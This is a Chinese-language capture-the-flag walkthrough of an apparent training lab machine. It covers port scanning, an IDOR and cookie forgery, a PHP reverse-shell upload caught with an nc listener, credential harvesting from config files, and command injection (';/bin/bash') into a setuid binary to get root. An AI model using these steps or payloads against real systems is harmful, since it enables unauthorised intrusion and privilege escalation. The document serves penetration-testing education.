第一步 端口扫描

nmap -sVC -T4 10.129.95.191

• -sV:服务版本发现
• -sC:使用默认脚本进行扫描，往往具有攻击性
  根据扫描结果，开放80端口，22端口，22端口除爆破外一般不作为主要突破口。

第二步 边界突破

1.简单浏览网站功能，发现主页主要是静态页面，暂无可下手的地方

2.查看网页源码，主要查看<a 标签和js等文件路径，方便起见这里使用burp挂代理访问网站，可以快速分析站点结构

发现/login路径，访问发现为登录页面。这里可以尝试目录爆破，SQL注入，这里以官方教程为主，发现简单爆破后并不能成功登录；仔细观察页面后，发现有个“以Ghust用户进行访问”的按钮，点击后可以成功登录访客账号。

继续观察页面，发现有Account和Uploads两个关键的功能模块，首先点击Account模块，观察页面内容和URL构成：

接下来尝试将URL中的id=2修改为id=1，此时发现管理员账号为admin 对应id为34322：

有Uploads模块，结合目录爆破结果发现有/uploads路径，可以想到上传webshell，从而进一步提权：

这里发现上传功能只对admin用户开放，这里就要想办法获得上传权限，这里想到修改Cookie【还可考虑sqlmap进行cookie注入】：

修改为admin对应的cookie后，发现uploads功能可以正常使用了，这里使用自带的webshell，使用nc进行反弹shell：
客户端运行一下命令，监听443端口：

sudo nc -lvnp 443

复制kali自带的webshell到当前目录下：

cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php

修改shell.php的端口和ip信息：

上传webshell，此时访问http://ip/uploads/shell.php，客户端443端口成功反弹shell：

为了使反弹的shell功能齐全，可以使用以下命令：

python3 -c 'import pty;pty.spawn("/bin/bash")'

3.目录爆破【在端口扫描时可同时进行】

gobuster dir -u http://10.129.95.191/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php

第三步 权限提升

1.查看Linux的/etc/passwd文件，查看系统存在哪些用户，发现除root用户外，还有其它一个用户robert：

2.目前获得的shell为网站用户的权限，翻看网站目录，有无相关配置文件保存敏感信息，网站目录一般为/var/www,发现与登陆有关的文件夹：/var/www/html/cdn-cgi/login，cd到该目录下，发现有以下几个文件：

3.在这几个文件中搜索密码有关字符，使用如下命令：

cat * | grep -i passw*

发现一个密码，根据内容判断为网站admin用户的登陆密码。
3.关注一个数据库有关的文件db.php:

发现其中有robert用户对应的密码。
4.由于开放22端口，现在又有robert用户的密码，可以使用ssh登录，
ssh robert@10.129.95.191
登陆后，在用户目录发现第一个flag：user.txt
5.查看当前用户信息：

发现其属于一个bugtracker组。
6.全盘查找他可以执行哪些文件：

find / -group bugtracker 2>/dev/null

发现存在一个文件/usr/bin/bugtracker
使用一下命令查看该文件信息，发现其为一个可执行文件，并且有s权限：
【s权限】：任何用户执行此文件时都是以该文件拥有者身份去执行的，这里拥有这是root，所以该文件是以root身份执行的。

ls -la /usr/bin/bugtracker && file /usr/bin/bugtracker

7.运行该二进制文件，输入1进行尝试，返回bug信息：

8.尝试输入错误的id，观察运行结果：

发现其是执行cat命令并进行回显。
9.由于使用root用户执行cat命令，这里有两种思路，官方文档的修改cat环境变量的思路和拼接命令的思路，这里使用拼接命令：

可以拼接的命令：

;/bin/bash
;/bin/sh
&/bin/bash
&/bin/sh

至此，提权成功，在root用户文件夹可以找到flag2